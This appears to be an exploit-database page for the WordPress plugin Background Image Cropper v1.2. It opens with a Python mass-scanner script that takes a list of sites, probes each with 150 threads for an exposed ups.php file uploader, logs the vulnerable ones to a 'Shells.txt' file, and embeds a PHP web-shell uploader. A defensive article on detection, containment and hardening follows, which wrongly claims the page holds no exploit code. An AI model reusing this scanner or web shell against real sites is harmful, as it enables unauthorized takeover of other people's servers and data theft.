Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution

Exploit Author: Milad karimi Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2024-04-21

# Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
# Date: 2024-04-16
# Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/background-image-cropper/
# Version: 1.2
# Category : webapps
# Tested on: windows 10 , firefox

import sys , requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)
shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo
"<form method='post' enctype='multipart/form-data'> <input type='file'
name='zb'><input type='submit' name='upload' value='upload'></form>";
if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],
$_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to
Upload."; } } ?>"""
requests.urllib3.disable_warnings()
headers = {'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A
Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/60.0.3112.107 Moblie Safari/537.36',
            'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
            'referer': 'www.google.com'}
try:
    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
    path = str(sys.argv[0]).split('\\')
    exit('\n  [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')

def URLdomain(site):
    if site.startswith("http://") :
        site = site.replace("http://","")
    elif site.startswith("https://") :
        site = site.replace("https://","")
    else :
        pass
    pattern = re.compile('(.*)/')
    while re.findall(pattern,site):
        sitez = re.findall(pattern,site)
        site = sitez[0]
    return site


def FourHundredThree(url):
    try:
        url = 'http://' + URLdomain(url)
        check =
requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
allow_redirects=True,timeout=15)
        if 'enctype="multipart/form-data" name="uploader"
id="uploader"><input type="file" name="file" size="50"><input name="_upl"
type="submit" id="_upl" value="Upload' in check.content:
                print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                open('Shells.txt', 'a').write(url +
'/wp-content/plugins/background-image-cropper/ups.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check =
requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
allow_redirects=True,verify=False ,timeout=15)
            if 'enctype="multipart/form-data" name="uploader"
id="uploader"><input type="file" name="file" size="50"><input name="_upl"
type="submit" id="_upl" value="Upload' in check.content:
                    print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                    open('Shells.txt', 'a').write(url +
'/wp-content/plugins/background-image-cropper/ups.php\n')
            else:
                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
    except :
        print ' -| ' + url + ' --> {}[Failed]'.format(fr)

mp = Pool(150)
mp.map(FourHundredThree, target)
mp.close()
mp.join()

print '\n [!] {}Saved in LOL.txt'.format(fc)

WordPress Plugin "Background Image Cropper" v1.2 — Remote Code Execution (RCE): Analysis, Impact, and Mitigation

This article explains the security issue reported in the Background Image Cropper WordPress plugin (v1.2), describes the real-world impact of an unauthenticated remote code execution (RCE) vulnerability, and provides practical, defensive guidance for administrators and incident responders. The content focuses on detection, containment, remediation, and long-term hardening — without reproducing exploit code or step-by-step attack procedures.

Summary of the Vulnerability

In affected versions of the Background Image Cropper plugin (reported in version 1.2), an unauthenticated file upload endpoint (commonly referenced as ups.php in public reports) was present in the plugin distribution. Because the endpoint lacked proper authentication, file-type validation, and safe storage/execution controls, it allowed an attacker to upload arbitrary files that could result in remote code execution when the uploaded file was executed by the web server.

Why this is serious

Remote Code Execution: An attacker who can upload a PHP or other executable file can execute commands on the server, leading to site takeover.
Persistence and Lateral Movement: Uploaded backdoors or web shells enable persistent access and can be used to move laterally to other sites on the same host.
Data Theft and Tampering: Database exfiltration, credential theft, and unauthorized modification of site content are typical consequences.
Reputation and SEO Damage: Compromised sites are often used to serve malware or phishing pages, harming site visitors and SEO ranking.

Who should care

Site owners using Background Image Cropper (or similar image/background plugins).
Hosting providers that host multiple WordPress instances.
Security teams performing vulnerability management, incident response, or threat hunting.

Detection: How to check if your site is affected (defensive methods)

Do not attempt to exploit the vulnerability. Use the following defensive checks to determine exposure and scope. Prefer checking files and configurations via your host control panel, SFTP, or server shell (for which you have authorization).

1. Verify plugin version via WP-Admin or WP-CLI

# List installed plugins and versions (requires WP-CLI & proper permissions)
wp plugin list

Explanation: wp plugin list shows installed plugins and version numbers so you can confirm whether Background Image Cropper is present and which version is installed.

2. Check for suspicious plugin files in the filesystem

# Example (run on the server as the site owner or admin):
ls -la wp-content/plugins/background-image-cropper/

Explanation: Inspect the plugin directory to see if unexpected files (for example, an upload handler named ups.php or similar) are present. If you find files you do not recognize, investigate their contents and timestamps.

3. Use safe, read-only HTTP checks (only when you manage the site)

# Request the plugin upload file page — use HEAD or GET carefully:
curl -I https://example.com/wp-content/plugins/background-image-cropper/ups.php

Explanation: A HEAD request can reveal whether the file exists without attempting uploads. Only perform HTTP checks against sites you control or have explicit permission to test.

4. Hunting for indicators of compromise (IOC)

Search for recently modified/created PHP files under wp-content/uploads (web-accessible upload directories).
Review access logs for suspicious POST requests targeting plugin paths.
Look for new administrative users or unexpected scheduled tasks (cron jobs).

Containment and Immediate Response

Temporarily take the site offline or put it in maintenance mode if you observe active compromise.
Disconnect affected systems from the network if server-level compromise is suspected.
Change all WordPress administrator and hosting control panel passwords after containment.
Preserve logs and filesystem snapshots for forensic analysis before making destructive changes.

Remediation and Recovery

1. Update or remove the plugin

If a patched version is available from a trusted source (WordPress.org), update immediately. If the plugin is unmaintained or no safe update exists, uninstall and delete the plugin files.

2. Remove malicious artifacts

After containment and evidence collection, remove unwanted upload handlers (e.g., ups.php) and any known web shells or unknown PHP files found in uploads or plugin directories.

3. Restore clean backups

If the site was compromised, restoring from a clean backup taken before the compromise is the quickest path to recovery. Ensure the backup is verified and patched after restoration.

4. Patch and harden the server

Apply WordPress core, theme, and plugin updates promptly.
Harden file permissions and ownership — ensure the webserver user cannot write to plugin and core code directories.
Disable risky PHP functions if your application does not need them (e.g., exec, system, passthru) via php.ini or host controls.

Preventive Controls and Long-Term Hardening

Use a Web Application Firewall (WAF) to block suspicious upload attempts and to create rules limiting access to known vulnerable endpoints.
Disable PHP execution in upload directories (see example below).
Adopt least-privilege file permissions; run sites in isolated containers or per-site user accounts.
Monitor file integrity (e.g., tripwire-like tools) and enable logging/alerting for changes to plugin directories.
Vet plugins before installation: check plugin reviews, last update date, and whether the author responds to security reports.

Example: Prevent PHP execution in uploads (Apache)

# Place this in a site-specific Apache configuration or a .htaccess inside wp-content/uploads/

  php_admin_flag engine Off


# Deny execution of PHP files by default

  Require all denied

Explanation: This configuration disables the PHP engine for the uploads directory and denies direct execution of PHP files placed there. Use the correct mod_php module name for your environment (e.g., mod_php7.c or mod_php8.c). Test changes in a staging environment before applying to production.

Example: Recommended PHP hardening (php.ini)

; Disable risky functions if not required by your application
disable_functions = exec,passthru,shell_exec,system,proc_open,popen

Explanation: Disabling potentially dangerous PHP functions reduces the impact of successful code execution. This is a defense-in-depth measure and should be evaluated against application requirements.

Incident Response Checklist

Task	Purpose
Isolate affected host	Prevent further access and lateral spread
Collect logs and filesystem snapshots	Preserve evidence for investigation
Scan for web shells and unexpected PHP files	Identify persistence mechanisms
Rotate credentials (WP, DB, hosting)	Remove attacker access
Restore from verified backup	Return to clean state
Apply patches and hardening	Prevent re-infection
Report findings to plugin maintainer/WordPress.org	Help protect other users

Responsible Disclosure and Reporting

If you find evidence of compromise related to this vulnerability or discover a vulnerable installation, follow coordinated disclosure practices:

Contact the plugin author/maintainer via the plugin’s WordPress.org support/patch channels.
If the plugin is hosted on WordPress.org, use the official disclosure process so a security update can be published.
If you are a hosting provider and detect widespread exploitation, consider informing affected customers and offering remediation assistance.

Final Recommendations (Executive)

Immediately verify whether Background Image Cropper is installed and which version is running.
If you manage affected sites, prioritize patching or removal and conduct an incident response if compromise is suspected.
Apply the preventive controls listed above (WAF, disable PHP in uploads, principle of least privilege).
Maintain a tested backup-and-restore process and monitor for suspicious file changes.